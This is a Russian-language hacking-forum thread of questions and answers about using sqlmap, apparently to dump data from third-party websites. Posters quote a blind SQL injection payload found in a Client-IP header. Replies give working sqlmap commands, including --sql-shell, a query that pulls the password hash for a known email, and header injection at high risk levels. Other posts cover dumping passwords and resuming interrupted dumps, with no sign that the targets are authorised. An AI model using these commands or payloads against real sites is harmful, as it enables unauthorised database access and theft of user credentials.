Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
    И ещё
    Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
     
  2. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,117
    Likes Received:
    762
    Reputations:
    200
    --start --stop
     
    _________________________
  3. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,117
    Likes Received:
    762
    Reputations:
    200
    1)--sql-shell
    2)SELECT * FROM table_name WHERE email="email@email.com";
     
    _________________________
    panic.ker and Spinus like this.
  4. =HALK=

    =HALK= Member

    Joined:
    30 Oct 2008
    Messages:
    28
    Likes Received:
    27
    Reputations:
    40
    --where="email='mail@mail'"
     
  5. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток. Подскажите как правильно "скормить" ссылку в sqlmap.
    Сканер выдал такие данные:
    This vulnerability affects /blog/adaptive-learning/.
    Discovered by: Scripting (Blind_Sql_Injection.script).
    Attack details
    HTTP Header input Client-IP was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

    И Header вот такой:

    GET /blog/adaptive-learning/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Client-IP: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
    X-Requested-With: XMLHttpRequest
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
    Code:
    -u https://site.ru/ --headers="Client-IP: *" --dbms=mysql --random-agent --level=3 --risk=3 --dbs
     
    o314um and vladF like this.
  7. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Ребят помогите, как правильно соединиться с сервером?
    Что должно быть в new xmpp.Router()
    /////////////////////////////////////////////////////////////
    var xmpp = require('node-xmpp')
    let s2s = new xmpp.Router()
    s2s.register('test.servers', function (stanza) {
    })

    ////////////////////////////////////////////////////////////
    Пишу Так
    -------------------------------------------
    var xmpp = require(
    'node-xmpp')
    let s2s = new xmpp.Router({
    host: 'localhost',
    port: 5269,
    })

    s2s.register('test.servers', function (stanza) {
    })

    -------------------------------------------
    Выдает
    ------------------------------------------------------------------------

    Unhandled rejection TypeError: xmpp.Router is not a constructor
    ------------------------------------------------------------------------
    В чем проблема???
     
    #847 nik1201, 21 Jan 2019
    Last edited: 21 Jan 2019
  8. Zabiyaka1

    Zabiyaka1 New Member

    Joined:
    21 Jan 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Скажите как через SQLmap напрямую подключиться к БД Oracle.Пакеты необходимые установила... Но вожу команду подключения вида:
    -d oracle://***Password@IP: PORT/dbname/
    Но SQlmap выдает

    [INFO] testing Oracle
    [INFO] confirming Oracle
    [INFO] the back-end DBMS is Oracle
    back-end DBMS: Oracle


    Если добавит --dbms то выдает, следующее

    [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
    [INFO] fetching current database
    [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
    [[WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
    INFO] fetching database (schema) names
    [INFO] falling back to current database
    [INFO] fetching current database
    [CRITICAL] unable to retrieve the database names


    Что не делаю не так, и возможно ли вообще подключиться в данном случае??
     
    #848 Zabiyaka1, 22 Jan 2019
    Last edited: 22 Jan 2019
  9. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    267
    Likes Received:
    129
    Reputations:
    2
    -d oraclel://test:123@127.0.0.1:3306/имябазы
    [CRITICAL] unable to retrieve the database names
    не может получить имя базы данных
    Пробуй --no-cast или --hex
    Другими словами мапа не может понять к чему ей подключатся.
    То есть тебе надо узнать имя бд для начала
     
    #849 karkajoi, 23 Jan 2019
    Last edited: 23 Jan 2019
    Zabiyaka1 and Sensoft like this.
  10. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Доброй ночи
    Несколько вопросов:
    1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?
    2. Бывает извлекает пасы как <blank> или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?
    3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.

    Спасибо за помощь
     
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    есть очень годный совет, правда большинство будет кидать камнями когда его услышит. если скуль ставит палки в колеса - бросай велик и крути скуль пешком :)
     
    _________________________
  12. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    вынужден не согласится :) мой совет не подойдет только при описании конкретного инъекта с определенными проблемами. в данном случае(и похожих) он вполне подходит
     
    _________________________
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    уу много букв, не осилил :(
     
    _________________________
  14. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    так и смысл тогда :)? я смотрю вы неплохо словоблудите, это ваша стихия :D
     
    _________________________
  15. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    У меня много талантов
     
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    охотно верю
    Code:
    1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?
    2. Бывает извлекает пасы как <blank> или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?
    3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.
    
    это, извиняюсь, ерунда
    1. - то что выводит sqlmap сугубо его дела, признаюсь лезть в многокиловый питоновский код, чтобы ответить на ваш вопрос, у меня желания нет
    2. - может быть что угодно, да может быть и waf "какая-то защита стоит я так понимаю". опять же, только ручной анализ поможет определить проблему и решение(если таковое существует)
    3. - вот этот вопрос собвственно и сподвиг меня облачить шпагу. как можно не знать как узнать текущую БД :mad:

    ваш нужно сейчас, просто и быстро нужна информация. хм, возможно тут найдутся люди которые помогут, сорь что потратил ваше время :)
     
    _________________________
  17. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    благодарствую
     
    t0ma5 likes this.
  18. prpuservice

    prpuservice New Member

    Joined:
    28 Jan 2019
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    приветствую всех , подскажите пожалуйста как оставить дамп в мапе , и чтобы он сохранил остаток , и потом при следующем запуске , начал с того же места.
     
  19. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    267
    Likes Received:
    129
    Reputations:
    2
    cntrl+C,мапа сохраняет лог дампа, при след. запуске она продолжит с места остановки.
     
    prpuservice likes this.
  20. prpuservice

    prpuservice New Member

    Joined:
    28 Jan 2019
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Ребята доброй ночи , подскажите в чем проблема sqlmap льет пустые строки [​IMG] , хотя когда лью jsql , то он сливает данные , а мап нет (
     
Loading...